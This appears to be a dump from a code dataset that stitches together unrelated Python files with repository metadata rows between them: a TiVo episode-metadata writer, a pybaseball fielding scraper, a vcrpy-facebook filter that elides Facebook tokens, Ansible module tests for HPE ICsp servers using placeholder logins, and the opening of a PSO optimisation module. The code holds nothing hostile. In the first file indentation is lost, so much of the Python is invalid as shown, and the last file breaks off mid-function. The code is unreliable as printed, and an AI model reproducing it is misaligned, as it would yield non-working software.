# For movies, you may repeat the name of the movie (The Mummy, Spiderman, etc), leave blank, or omit.
data += ("seriesTitle : " + myShow["seriesname"] + "\n")
# Title of the episode (Pilot, Homer's Night Out, Episode 02, etc.) Should be included for episodic shows.
# Leave blank or omit for movies.
data += ("episodeTitle : " + curEpToWrite.name + "\n")
# This should be entered for episodic shows and omitted for movies. The standard tivo format is to enter
# the season number followed by the episode number for that season. For example, enter 201 for season 2
# episode 01.
# This only shows up if you go into the Details from the Program screen.
# This seems to disappear once the video is transferred to TiVo.
# NOTE: May not be correct format, missing season, but based on description from wiki leaving as is.
data += ("episodeNumber : " + str(curEpToWrite.episode) + "\n")
# Must be entered as true or false. If true, the year from originalAirDate will be shown in parentheses
# after the episode's title and before the description on the Program screen.
# FIXME: Hardcode isEpisode to true for now, not sure how to handle movies
data += ("isEpisode : true\n")
# Write the synopsis of the video here.
            # Microsoft Word's smartquotes can die in a fire.
sanitizedDescription = curEpToWrite.description
# Replace double curly quotes
sanitizedDescription = sanitizedDescription.replace(u"\u201c", "\"").replace(u"\u201d", "\"")
# Replace single curly quotes
sanitizedDescription = sanitizedDescription.replace(u"\u2018", "'").replace(u"\u2019", "'").replace(u"\u02BC", "'")
data += ("description : " + sanitizedDescription + "\n")
            # Usually starts with "SH" and is followed by 6-8 digits.
            # Tivo uses zap2it for their data, so the series id is the zap2it_id.
if myShow["zap2it_id"] != None:
data += ("seriesId : " + myShow["zap2it_id"] + "\n")
# This is the call sign of the channel the episode was recorded from.
if myShow["network"] != None:
data += ("callsign : " + myShow["network"] + "\n")
# This must be entered as yyyy-mm-ddThh:mm:ssZ (the t is capitalized and never changes, the Z is also
# capitalized and never changes). This is the original air date of the episode.
# NOTE: Hard coded the time to T00:00:00Z as we really don't know when during the day the first run happened.
if curEpToWrite.airdate != datetime.date.fromordinal(1):
data += ("originalAirDate : " + str(curEpToWrite.airdate) + "T00:00:00Z\n")
# This shows up at the beginning of the description on the Program screen and on the Details screen.
if myShow["actors"]:
for actor in myShow["actors"].split('|'):
if actor:
data += ("vActor : " + str(actor) + "\n")
# This is shown on both the Program screen and the Details screen. It uses a single digit to determine the
# number of stars: 1 for 1 star, 7 for 4 stars
if myShow["rating"] != None:
try:
rating = float(myShow['rating'])
except ValueError:
rating = 0.0
rating = rating / 10 * 4
data += ("starRating : " + str(rating) + "\n")
# This is shown on both the Program screen and the Details screen.
# It uses the standard TV rating system of: TV-Y7, TV-Y, TV-G, TV-PG, TV-14, TV-MA and TV-NR.
if myShow["contentrating"]:
data += ("tvRating : " + str(myShow["contentrating"]) + "\n")
# This field can be repeated as many times as necessary or omitted completely.
if ep_obj.show.genre:
for genre in ep_obj.show.genre.split('|'):
if genre:
data += ("vProgramGenre : " + str(genre) + "\n")
# NOTE: The following are metadata keywords are not used
# displayMajorNumber
# showingBits
# displayMinorNumber
# colorCode
# vSeriesGenre
# vGuestStar, vDirector, vExecProducer, vProducer, vWriter, vHost, vChoreographer
# partCount
# partIndex
return data
def write_ep_file(self, ep_obj):
"""
Generates and writes ep_obj's metadata under the given path with the
given filename root. Uses the episode's name with the extension in
_ep_nfo_extension.
ep_obj: TVEpisode object for which to create the metadata
file_name_path: The file name to use for this metadata. Note that the extension
will be automatically added based on _ep_nfo_extension. This should
include an absolute path.
"""
data = self._ep_data(ep_obj)
if not data:
return False
nfo_file_path = self.get_episode_file_path(ep_obj)
nfo_file_dir = ek.ek(os.path.dirname, nfo_file_path)
try:
if not ek.ek(os.path.isdir, nfo_file_dir):
logger.log("Metadata dir didn't exist, creating it at "+nfo_file_dir, logger.DEBUG)
ek.ek(os.makedirs, nfo_file_dir)
helpers.chmodAsParent(nfo_file_dir)
logger.log(u"Writing episode nfo file to "+nfo_file_path)
nfo_file = ek.ek(open, nfo_file_path, 'w')
# Calling encode directly, b/c often descriptions have wonky characters.
nfo_file.write( data.encode( "utf-8" ) )
nfo_file.close()
helpers.chmodAsParent(nfo_file_path)
except IOError, e:
logger.log(u"Unable to write file to "+nfo_file_path+" - are you sure the folder is writable? "+str(e).decode('utf-8'), logger.ERROR)
return False
return True
# present a standard "interface"
metadata_class = TIVOMetadata
| gpl-2.0 | 3,020,361,615,287,338,500 | 40.85489 | 176 | 0.562632 | false |
jldbc/pybaseball | pybaseball/team_fielding.py | 1 | 2821 | import warnings
import pandas as pd
import requests
from bs4 import BeautifulSoup, Comment
from . import cache
from .datahelpers import postprocessing
from .datasources.fangraphs import fg_team_fielding_data
# This is just a pass through for the new, more configurable function
team_fielding = fg_team_fielding_data
@cache.df_cache()
def team_fielding_bref(team, start_season, end_season=None):
"""
Get season-level Fielding Statistics for Specific Team (from Baseball-Reference)
ARGUMENTS:
team : str : The Team Abbreviation (i.e., 'NYY' for Yankees) of the Team you want data for
start_season : int : first season you want data for (or the only season if you do not specify an end_season)
end_season : int : final season you want data for
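    Illustrative call (team and seasons are arbitrary): team_fielding_bref('NYY', 2018, 2019)
    returns a DataFrame with one row per player-season scraped from the team's
    Baseball-Reference fielding pages, including an inserted "Year" column.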
"""
if start_season is None:
raise ValueError(
"You need to provide at least one season to collect data for. " +
"Try team_fielding_bref(season) or team_fielding_bref(start_season, end_season)."
)
if end_season is None:
end_season = start_season
url = "https://www.baseball-reference.com/teams/{}".format(team)
data = []
headings = None
for season in range(start_season, end_season+1):
stats_url = "{}/{}-fielding.shtml".format(url, season)
response = requests.get(stats_url)
soup = BeautifulSoup(response.content, 'html.parser')
fielding_div = soup.find('div', {'id': 'all_standard_fielding'})
comment = fielding_div.find(
string=lambda text: isinstance(text, Comment))
fielding_hidden = BeautifulSoup(comment.extract(), 'html.parser')
table = fielding_hidden.find('table')
thead = table.find('thead')
if headings is None:
headings = [row.text.strip()
for row in thead.find_all('th')]
rows = table.find('tbody').find_all('tr')
for row in rows:
cols = row.find_all(['td', 'th'])
cols = [ele.text.strip() for ele in cols]
# Removes '*' and '#' from some names
cols = [col.replace('*', '').replace('#', '') for col in cols]
# Removes Team Totals and other rows
cols = [
col for col in cols if 'Team Runs' not in col
]
cols.insert(2, season)
data.append(cols)
headings.insert(2, "Year")
data = pd.DataFrame(data=data, columns=headings)
data = data.dropna() # Removes Row of All Nones
postprocessing.coalesce_nulls(data)
postprocessing.convert_percentages(data, ['CS%', 'lgCS%'])
postprocessing.convert_numeric(
data,
postprocessing.columns_except(
data,
['Team', 'Name', 'Pos\xa0Summary']
)
)
return data
| mit | 4,591,668,430,960,663,000 | 32.583333 | 115 | 0.609358 | false |
agriffis/vcrpy-facebook | vcr_facebook/request.py | 1 | 4164 | from __future__ import absolute_import, unicode_literals, print_function
import hashlib
import logging
import re
import zlib
from .compat import OrderedDict, parse_qsl, quote
from .filters import (make_batch_relative_url_filter, make_multipart_filter, make_query_filter,
make_url_filter, make_elider_filter)
from .util import always_return
logger = logging.getLogger(__name__)
def wrap_before_record(wrapped, **kwargs):
before_record = make_before_record(**kwargs)
def wrapper(request):
request = before_record(request)
request = wrapped(request)
return request
return wrapper
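# Illustrative wiring (not part of the original module; argument values are made up):
# the wrapper is intended to be handed to vcrpy as its before-record hook, e.g.
#   my_vcr = vcr.VCR(before_record_request=wrap_before_record(
#       lambda request: request,
#       elide_appsecret_proof=None, elide_access_token=None,
#       elide_client_secret=None, elider_prefix='XXX'))
# so Facebook credentials are elided before cassettes are written to disk.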
def make_before_record(elide_appsecret_proof,
elide_access_token,
elide_client_secret,
elider_prefix):
appsecret_proof_filter = make_elider_filter(
'appsecret_proof',
elide_appsecret_proof and (
lambda q: elide_appsecret_proof(q['appsecret_proof'],
q['access_token'])),
elider_prefix,
)
access_token_filter = make_elider_filter(
'access_token',
elide_access_token and (
lambda q: elide_access_token(q['access_token'])),
elider_prefix,
)
input_token_filter = make_elider_filter(
'input_token',
elide_access_token and (
lambda q: elide_access_token(q['input_token'])),
elider_prefix,
)
client_secret_filter = make_elider_filter(
'client_secret',
elide_client_secret and (
lambda q: elide_client_secret(q['client_secret'])),
elider_prefix,
)
def _filter_body(body):
filters = [
make_multipart_filter(filter_uploads),
make_batch_relative_url_filter(appsecret_proof_filter),
make_batch_relative_url_filter(access_token_filter),
make_batch_relative_url_filter(input_token_filter),
make_batch_relative_url_filter(client_secret_filter),
make_query_filter(appsecret_proof_filter),
make_query_filter(access_token_filter),
make_query_filter(input_token_filter),
make_query_filter(client_secret_filter),
make_multipart_filter(appsecret_proof_filter),
make_multipart_filter(access_token_filter),
make_multipart_filter(input_token_filter),
make_multipart_filter(client_secret_filter),
]
for f in filters:
body = f(body)
return body
def _filter_headers(headers):
if 'content-length' in headers:
del headers['content-length']
return headers
def _filter_url(url):
filters = [
make_url_filter(appsecret_proof_filter),
make_url_filter(access_token_filter),
make_url_filter(client_secret_filter),
]
for f in filters:
url = f(url)
return url
def before_record(request):
if request.host != 'graph.facebook.com':
return request
request.body = _filter_body(request.body)
request.headers = _filter_headers(request.headers)
request.uri = _filter_url(request.uri)
request = filter_multipart_boundary(request)
return request
return before_record
def filter_uploads(parts):
for p in parts:
if b'; filename="' in p.header and len(p.content) > 100:
p.content = hashlib.md5(p.content).hexdigest()
return parts
MULTIPART_BOUNDARY = b'xxBOUNDARY' * 10
def filter_multipart_boundary(request):
content_type = request.headers.get('content-type', '')
prefix, equals, boundary = content_type.partition('=')
if boundary and prefix == 'multipart/form-data; boundary':
boundary = MULTIPART_BOUNDARY[:len(boundary)]
request.headers['content-type'] = b'{0}={1}'.format(prefix, boundary)
def filter(parts):
assert len(parts.boundary) == len(boundary)
parts.boundary = boundary
return parts
request.body = make_multipart_filter(filter)(request.body)
return request
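# Replacing the randomly generated multipart boundary with a fixed, equal-length one
# keeps recorded bodies stable between runs; illustratively, a header such as
#   multipart/form-data; boundary=----WebKitFormBoundaryAbC123
# becomes
#   multipart/form-data; boundary=xxBOUNDARYxxBOUNDARYxxBOUNDA
# (same length, deterministic content).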
| mit | -3,190,449,575,350,943,000 | 32.047619 | 95 | 0.60879 | false |
HewlettPackard/oneview-ansible | test/test_hpe_icsp_server.py | 1 | 10504 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import mock
import json
import pytest
import yaml
from oneview_module_loader import ICspHelper
from hpe_icsp_server import (ICspServerModule,
main as hpe_icsp_server_main)
from hpICsp.exceptions import HPICspInvalidResource
MODULE_NAME = 'hpe_icsp_server'
SERVER_IP = "16.124.135.239"
YAML_SERVER_PRESENT = """
state: present
api_version: 300
icsp_host: "16.124.133.245"
username: "Administrator"
password: "admin"
server_ipAddress: "16.124.135.239"
server_username: "Admin"
server_password: "serveradmin"
server_port: 443
"""
YAML_SERVER_ABSENT = """
state: absent
api_version: 300
icsp_host: "16.124.133.251"
username: "Administrator"
password: "admin"
server_ipAddress: "16.124.135.239"
"""
YAML_NETWORK_CONFIGURED = """
state: network_configured
api_version: 300
icsp_host: "16.124.133.245"
username: "Administrator"
password: "admin"
server_ipAddress: "16.124.135.239"
server_username: "Admin"
server_password: "serveradmin"
server_port: 443
server_personality_data:
network_config:
hostname: "test-web.io.fc.hpe.com"
domain: "demo.com"
interfaces:
- macAddress: "01:23:45:67:89:ab"
enabled: true
dhcpv4: false
ipv6Autoconfig:
dnsServers:
- "16.124.133.2"
staticNetworks:
- "16.124.133.39/255.255.255.0"
vlanid: -1
ipv4gateway: "16.124.133.1"
ipv6gateway:
virtualInterfaces:
"""
DEFAULT_SERVER = {"name": "SP-01", "uri": "/uri/239", "ilo": {"ipAddress": SERVER_IP}}
SERVER_ADDED = {"name": "SP-03", "uri": "/uri/188", "ilo": {"ipAddress": "16.124.135.188"}}
SERVERS = {
"members": [
DEFAULT_SERVER,
{"name": "SP-02", "uri": "/uri/233", "ilo": {"ipAddress": "16.124.135.233"}}
]
}
CONNECTION = {}
ICSP_JOBS = {}
JOB_RESOURCE = {"uri": "/rest/os-deployment-jobs/123456"}
class TestIcspServer():
@pytest.fixture(autouse=True)
def setUp(self):
self.patcher_ansible_module = mock.patch(MODULE_NAME + '.AnsibleModule')
self.mock_ansible_module = self.patcher_ansible_module.start()
self.mock_ansible_instance = mock.Mock()
self.mock_ansible_module.return_value = self.mock_ansible_instance
self.patcher_icsp_service = mock.patch(MODULE_NAME + '.hpICsp')
self.mock_icsp = self.patcher_icsp_service.start()
self.mock_connection = mock.Mock()
self.mock_connection.login.return_value = CONNECTION
self.mock_icsp.connection.return_value = self.mock_connection
self.mock_server_service = mock.Mock()
self.mock_icsp.servers.return_value = self.mock_server_service
yield
self.patcher_ansible_module.stop()
self.patcher_icsp_service.stop()
def test_should_not_add_server_when_already_present(self):
self.mock_connection.get.return_value = SERVERS
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_PRESENT)
ICspServerModule().run()
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=False,
msg=ICspServerModule.SERVER_ALREADY_PRESENT,
ansible_facts=dict(target_server=DEFAULT_SERVER)
)
def test_should_add_server(self):
self.mock_connection.get.side_effect = [{'members': []}, SERVERS]
self.mock_server_service.add_server.return_value = JOB_RESOURCE
self.mock_icsp.jobs.return_value = ICSP_JOBS
self.mock_icsp.common = mock.Mock()
self.mock_icsp.common.monitor_execution.return_value = {}
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_PRESENT)
hpe_icsp_server_main()
ilo_body = {'ipAddress': "16.124.135.239",
'username': "Admin",
'password': "serveradmin",
'port': 443}
self.mock_server_service.add_server.assert_called_once_with(ilo_body)
self.mock_icsp.common.monitor_execution.assert_called_once_with(JOB_RESOURCE, ICSP_JOBS)
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=True,
msg="Server created: '/uri/239'",
ansible_facts=dict(target_server=DEFAULT_SERVER)
)
def test_expect_exception_not_caught_when_create_server_raise_exception(self):
self.mock_connection.get.side_effect = [{'members': []}, SERVERS]
self.mock_server_service.add_server.side_effect = Exception("message")
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_PRESENT)
try:
ICspServerModule().run()
except Exception as e:
assert "message" == e.args[0]
else:
pytest.fail("Expected Exception was not raised")
def test_should_not_try_delete_server_when_it_is_already_absent(self):
self.mock_connection.get.return_value = {'members': []}
self.mock_server_service.delete_server.return_value = {}
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
ICspServerModule().run()
self.mock_server_service.delete_server.assert_not_called()
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=False,
msg=ICspServerModule.SERVER_ALREADY_ABSENT
)
def test_should_delete_server(self):
self.mock_connection.get.return_value = SERVERS
self.mock_server_service.delete_server.return_value = {}
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
ICspServerModule().run()
self.mock_server_service.delete_server.assert_called_once_with("/uri/239")
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=True,
msg="Server '/uri/239' removed successfully from ICsp."
)
def test_should_fail_with_all_exe_attr_when_HPICspException_raised_on_delete(self):
self.mock_connection.get.return_value = SERVERS
        exception_value = {"message": "Fake Message", "details": "Details", "errorCode": "INVALID_RESOURCE"}
        self.mock_server_service.delete_server.side_effect = HPICspInvalidResource(exception_value)
        self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
        ICspServerModule().run()
        # Load called args and convert to dict to prevent str comparison with different reordering (Python 3.5)
        fail_json_args_msg = self.mock_ansible_instance.fail_json.call_args[1]['msg']
        error_raised = json.loads(fail_json_args_msg)
        assert error_raised == exception_value
def test_should_fail_with_args_joined_when_common_exception_raised_on_delete(self):
self.mock_connection.get.return_value = SERVERS
self.mock_server_service.delete_server.side_effect = Exception("Fake Message", "INVALID_RESOURCE")
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
ICspServerModule().run()
self.mock_ansible_instance.fail_json.assert_called_once_with(msg='Fake Message; INVALID_RESOURCE')
def test_should_configure_network(self):
self.mock_connection.get.side_effect = [SERVERS, SERVERS]
self.mock_connection.post.return_value = JOB_RESOURCE
self.mock_server_service.get_server.return_value = DEFAULT_SERVER
self.mock_ansible_instance.params = yaml.load(YAML_NETWORK_CONFIGURED)
ICspServerModule().run()
network_config_state = yaml.load(YAML_NETWORK_CONFIGURED)
network_config = {
"serverData": [
{"serverUri": DEFAULT_SERVER['uri'], "personalityData": network_config_state['server_personality_data'],
"skipReboot": True}],
"failMode": None,
"osbpUris": []
}
uri = '/rest/os-deployment-jobs/?writeOnly=true'
self.mock_connection.post.assert_called_once_with(uri, network_config)
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=True,
msg=ICspServerModule.CUSTOM_ATTR_NETWORK_UPDATED,
ansible_facts=dict(target_server=DEFAULT_SERVER)
)
def test_should_fail_when_try_configure_network_without_inform_personality_data(self):
self.mock_connection.get.return_value = SERVERS
self.mock_server_service.get_server.return_value = DEFAULT_SERVER
params_config_network = yaml.load(YAML_NETWORK_CONFIGURED)
params_config_network['server_personality_data'] = {}
self.mock_ansible_instance.params = params_config_network
ICspServerModule().run()
self.mock_ansible_instance.fail_json.assert_called_once_with(msg=ICspServerModule.SERVER_PERSONALITY_DATA_REQUIRED)
def test_should_fail_when_try_configure_network_for_not_found_server(self):
self.mock_connection.get.return_value = {'members': []}
self.mock_ansible_instance.params = yaml.load(YAML_NETWORK_CONFIGURED)
ICspServerModule().run()
self.mock_ansible_instance.exit_json.assert_called_once_with(changed=False,
msg=ICspServerModule.SERVER_NOT_FOUND)
def test_expect_exception_not_caught_when_configure_network_raise_exception(self):
self.mock_connection.get.return_value = SERVERS
self.mock_connection.post.side_effect = Exception("message")
self.mock_ansible_instance.params = yaml.load(YAML_NETWORK_CONFIGURED)
try:
hpe_icsp_server_main()
except Exception as e:
assert "message" == e.args[0]
else:
pytest.fail("Expected Exception was not raised")
if __name__ == '__main__':
pytest.main([__file__])
| apache-2.0 | -3,992,395,171,992,851,500 | 34.727891 | 123 | 0.647944 | false |
PhonologicalCorpusTools/CorpusTools | corpustools/gui/ppgui.py | 1 | 16303 | import os
from collections import OrderedDict
from .imports import *
from corpustools.phonoprob.phonotactic_probability import (phonotactic_probability,
phonotactic_probability_all_words)
from corpustools.neighdens.io import load_words_neighden
from corpustools.corpus.classes import Attribute
from corpustools.exceptions import PCTError, PCTPythonError
from .windows import FunctionWorker, FunctionDialog
from .widgets import (RadioSelectWidget, FileWidget, TierWidget, RestrictedContextWidget)
from .corpusgui import AddWordDialog
from corpustools.contextmanagers import (CanonicalVariantContext,
MostFrequentVariantContext)
from corpustools import __version__
class PPWorker(FunctionWorker):
def run(self):
kwargs = self.kwargs
self.results = []
context = kwargs.pop('context')
if context == RestrictedContextWidget.canonical_value:
cm = CanonicalVariantContext
elif context == RestrictedContextWidget.frequent_value:
cm = MostFrequentVariantContext
corpus = kwargs['corpusModel'].corpus
st = kwargs['sequence_type']
tt = kwargs['type_token']
att = kwargs.get('attribute', None)
ft = kwargs['frequency_cutoff']
log_count = kwargs['log_count']
with cm(corpus, st, tt, attribute=att, frequency_threshold = ft, log_count=log_count) as c:
try:
if 'query' in kwargs:
for q in kwargs['query']:
res = phonotactic_probability(c, q,
algorithm = kwargs['algorithm'],
probability_type = kwargs['probability_type'],
stop_check = kwargs['stop_check'],
call_back = kwargs['call_back'])
if self.stopped:
break
self.results.append([q,res])
else:
end = kwargs['corpusModel'].beginAddColumn(att)
phonotactic_probability_all_words(c,
algorithm = kwargs['algorithm'],
probability_type = kwargs['probability_type'],
#num_cores = kwargs['num_cores'],
stop_check = kwargs['stop_check'],
call_back = kwargs['call_back'])
end = kwargs['corpusModel'].endAddColumn(end)
except PCTError as e:
self.errorEncountered.emit(e)
return
except Exception as e:
e = PCTPythonError(e)
self.errorEncountered.emit(e)
return
if self.stopped:
self.finishedCancelling.emit()
return
self.dataReady.emit(self.results)
class PPDialog(FunctionDialog):
header = ['Corpus',
'PCT ver.',
'Word',
'Analysis name',
'Algorithm',
'Probability type',
'Transcription tier',
'Frequency type',
'Log-scaled frequency',
'Pronunciation variants',
'Minimum word frequency',
'Result']
_about = [('This function calculates the phonotactic probability '
'of a word based on positional probabilities of single '
'segments and biphones derived from a corpus.'),
'',
'References: ',
('Vitevitch, Michael S. & Paul A. Luce. 2004.'
' A Web-based interface to calculate phonotactic'
' probability for words and nonwords in English.'
' Behavior Research Methods, Instruments, & Computers 36 (3), 481-487')
]
name = 'phonotactic probability'
def __init__(self, parent, settings, corpusModel, inventory, showToolTips):
FunctionDialog.__init__(self, parent, settings, PPWorker())
self.corpusModel = corpusModel
self.inventory = inventory
self.showToolTips = showToolTips
pplayout = QHBoxLayout()
algEnabled = {'Vitevitch && Luce':True}
self.algorithmWidget = RadioSelectWidget('Phonotactic probability algorithm',
OrderedDict([
('Vitevitch && Luce','vitevitch'),
]),
{'Vitevitch && Luce':self.vitevitchSelected,
},
algEnabled)
pplayout.addWidget(self.algorithmWidget)
queryFrame = QGroupBox('Query')
vbox = QFormLayout()
self.compType = None
self.oneWordRadio = QRadioButton('Calculate for one word')
self.oneWordRadio.clicked.connect(self.oneWordSelected)
self.oneWordRadio.setAutoExclusive(True)
self.oneWordEdit = QLineEdit()
self.oneWordEdit.textChanged.connect(self.oneWordRadio.click)
self.oneWordRadio.setChecked(True)
self.oneWordRadio.click()
self.oneNonwordRadio = QRadioButton('Calculate for a word/nonword not in the corpus')
self.oneNonwordRadio.clicked.connect(self.oneNonwordSelected)
self.oneNonwordRadio.setAutoExclusive(True)
self.oneNonwordLabel = QLabel('None created')
self.oneNonword = None
self.oneNonwordButton = QPushButton('Create word/nonword')
self.oneNonwordButton.clicked.connect(self.createNonword)
self.fileRadio = QRadioButton('Calculate for list of words')
self.fileRadio.clicked.connect(self.fileSelected)
self.fileRadio.setAutoExclusive(True)
self.fileWidget = FileWidget('Select a file', 'Text file (*.txt *.csv)')
self.fileWidget.textChanged.connect(self.fileRadio.click)
self.allwordsRadio = QRadioButton('Calculate for all words in the corpus')
self.allwordsRadio.clicked.connect(self.allwordsSelected)
self.allwordsRadio.setAutoExclusive(True)
self.columnEdit = QLineEdit()
self.columnEdit.setText('Phonotactic probability')
self.columnEdit.textChanged.connect(self.allwordsRadio.click)
vbox.addRow(self.oneWordRadio)
vbox.addRow(self.oneWordEdit)
vbox.addRow(self.oneNonwordRadio)
vbox.addRow(self.oneNonwordLabel,self.oneNonwordButton)
vbox.addRow(self.fileRadio)
vbox.addRow(self.fileWidget)
vbox.addRow(self.allwordsRadio)
vbox.addRow(QLabel('Column name:'),self.columnEdit)
note = QLabel(('(Selecting this option will add a new column containing the results to your corpus. '
'No results window will be displayed.)'))
note.setWordWrap(True)
vbox.addRow(note)
queryFrame.setLayout(vbox)
pplayout.addWidget(queryFrame)
optionFrame = QGroupBox('Options')
optionLayout = QVBoxLayout()
self.useLogScale = QCheckBox('Use log-scaled word frequencies (token count only)')
optionLayout.addWidget(self.useLogScale)
self.useLogScale.setChecked(True)
self.tierWidget = TierWidget(self.corpusModel.corpus,include_spelling=False)
optionLayout.addWidget(self.tierWidget)
self.typeTokenWidget = RadioSelectWidget('Type or token',
OrderedDict([('Count types','type'),
('Count tokens','token')]))
for widget in self.typeTokenWidget.widgets:
if 'token' in widget.text():
#we can only use log-scaling on token frequency
widget.clicked.connect(lambda x: self.useLogScale.setEnabled(True))
else:
#if type frequency is selected, then disable to log-scale option
widget.clicked.connect(lambda y: self.useLogScale.setEnabled(False))
self.typeTokenWidget.widgets[1].click()
#normally we do self.typeTokenWidget.initialClick()
        #but here we default to token, not type, because that's in the original algorithm by V&L
actions = None
self.variantsWidget = RestrictedContextWidget(self.corpusModel.corpus, actions)
optionLayout.addWidget(self.variantsWidget)
optionLayout.addWidget(self.typeTokenWidget)
self.probabilityTypeWidget = RadioSelectWidget('Probability type',
OrderedDict([
('Biphone','bigram'),
('Single-phone','unigram')]))
optionLayout.addWidget(self.probabilityTypeWidget)
##----------------------
minFreqFrame = QGroupBox('Minimum frequency')
box = QFormLayout()
self.minFreqEdit = QLineEdit()
box.addRow('Minimum word frequency:',self.minFreqEdit)
minFreqFrame.setLayout(box)
optionLayout.addWidget(minFreqFrame)
##----------------------
optionFrame.setLayout(optionLayout)
pplayout.addWidget(optionFrame)
ppFrame = QFrame()
ppFrame.setLayout(pplayout)
self.layout().insertWidget(0,ppFrame)
self.algorithmWidget.initialClick()
self.algorithmWidget.initialClick()
if self.showToolTips:
self.tierWidget.setToolTip(("<FONT COLOR=black>"
                                    'Select whether to calculate phonotactic probability'
' on the spelling of a word (perhaps more useful for morphological purposes)'
' or any transcription tier of a word (perhaps more useful for phonological purposes),'
' in the corpus.'
"</FONT>"))
self.useLogScale.setToolTip(("<FONT COLOR=black>"
'If checked, then the token frequency count will be log-scaled. This option does not apply to type'
' frequency.'
"</FONT>"))
def createNonword(self):
dialog = AddWordDialog(self, self.corpusModel.corpus, self.inventory)
if dialog.exec_():
self.oneNonword = dialog.word
self.oneNonwordLabel.setText('{} ({})'.format(str(self.oneNonword),
str(self.oneNonword.transcription)))
self.oneNonwordRadio.click()
def oneWordSelected(self):
self.compType = 'one'
def oneNonwordSelected(self):
self.compType = 'nonword'
def fileSelected(self):
self.compType = 'file'
def allwordsSelected(self):
self.compType = 'all'
def generateKwargs(self):
##------------------
try:
frequency_cutoff = float(self.minFreqEdit.text())
except ValueError:
frequency_cutoff = 0.0
##-------------------
kwargs = {'corpusModel':self.corpusModel,
'algorithm': self.algorithmWidget.value(),
'context': self.variantsWidget.value(),
'sequence_type':self.tierWidget.value(),
'type_token':self.typeTokenWidget.value(),
'frequency_cutoff':frequency_cutoff,
'probability_type':self.probabilityTypeWidget.value(),
'log_count': self.useLogScale.isEnabled() and self.useLogScale.isChecked()}
if self.compType is None:
reply = QMessageBox.critical(self,
"Missing information", "Please specify a comparison type.")
return
elif self.compType == 'one':
text = self.oneWordEdit.text()
if not text:
reply = QMessageBox.critical(self,
"Missing information", "Please specify a word.")
return
try:
w = self.corpusModel.corpus.find(text)
except KeyError:
reply = QMessageBox.critical(self,
"Invalid information", "The spelling specified does match any words in the corpus.")
return
kwargs['query'] = [w]
elif self.compType == 'nonword':
if self.oneNonword is None:
reply = QMessageBox.critical(self,
"Missing information", "Please create a word/nonword.")
return
if not getattr(self.oneNonword,kwargs['sequence_type']):
reply = QMessageBox.critical(self,
"Missing information", "Please recreate the word/nonword with '{}' specified.".format(self.tierWidget.displayValue()))
return
kwargs['query'] = [self.oneNonword]
elif self.compType == 'file':
path = self.fileWidget.value()
if not path:
reply = QMessageBox.critical(self,
"Missing information", "Please enter a file path.")
return
if not os.path.exists(path):
reply = QMessageBox.critical(self,
"Invalid information", "The file path entered was not found.")
return
kwargs['query'] = list()
text = load_words_neighden(path)
for t in text:
if isinstance(t,str):
try:
w = self.corpusModel.corpus.find(t)
except KeyError:
reply = QMessageBox.critical(self,
"Invalid information", "The spelling '{}' was not found in the corpus.".format(t))
return
kwargs['query'].append(w)
elif self.compType == 'all':
column = self.columnEdit.text()
if column == '':
reply = QMessageBox.critical(self,
"Missing information", "Please enter a column name.")
return
colName = column.replace(' ','_')
attribute = Attribute(colName,'numeric',column)
if column in self.corpusModel.columns:
msgBox = QMessageBox(QMessageBox.Warning, "Duplicate columns",
"'{}' is already the name of a column. Overwrite?".format(column), QMessageBox.NoButton, self)
msgBox.addButton("Overwrite", QMessageBox.AcceptRole)
msgBox.addButton("Cancel", QMessageBox.RejectRole)
if msgBox.exec_() != QMessageBox.AcceptRole:
return
kwargs['attribute'] = attribute
return kwargs
def setResults(self, results):
self.results = []
try:
frequency_cutoff = float(self.minFreqEdit.text())
except ValueError:
frequency_cutoff = 0.0
for result in results:
w, pp = result
self.results.append({'Corpus': self.corpusModel.corpus.name,
'PCT ver.': __version__,#self.corpusModel.corpus._version,
'Analysis name': self.name.capitalize(),
'Word': str(w),
'Algorithm': self.algorithmWidget.displayValue().replace('&&','&'),
'Probability type': self.probabilityTypeWidget.displayValue(),
'Transcription tier': self.tierWidget.displayValue(),
'Frequency type': self.typeTokenWidget.value().title(),
'Log-scaled frequency': 'Yes' if self.useLogScale.isChecked() else 'No',
'Pronunciation variants': self.variantsWidget.value().title(),
'Minimum word frequency': frequency_cutoff,
'Result': pp})
def vitevitchSelected(self):
self.probabilityTypeWidget.enable()
self.typeTokenWidget.enable()
| bsd-3-clause | 7,514,661,540,657,869,000 | 43.181572 | 142 | 0.5518 | false |
avanwyk/cipy | cipy/algorithms/pso/functions.py | 1 | 9569 | # Copyright 2016 Andrich van Wyk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Collection of functions used to implement the PSO algorithm.
"""
import numpy as np
from cipy.algorithms.core import comparator
from cipy.algorithms.pso.types import Particle
def std_position(position, velocity):
"""
Standard particle position update according to the equation:
:math:`x_{ij}(t+1) = x_{ij}(t) + \
v_{ij}(t),\\;\\;\\forall\\; j \\in\\; \\{1,...,n\\}`
Args:
position (numpy.array): The current position.
velocity (numpy.array): The particle velocity.
Returns:
numpy.array: The calculated position.
"""
return position + velocity
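def _example_std_position():
    # Illustration helper (added for clarity, not in the original module): the new
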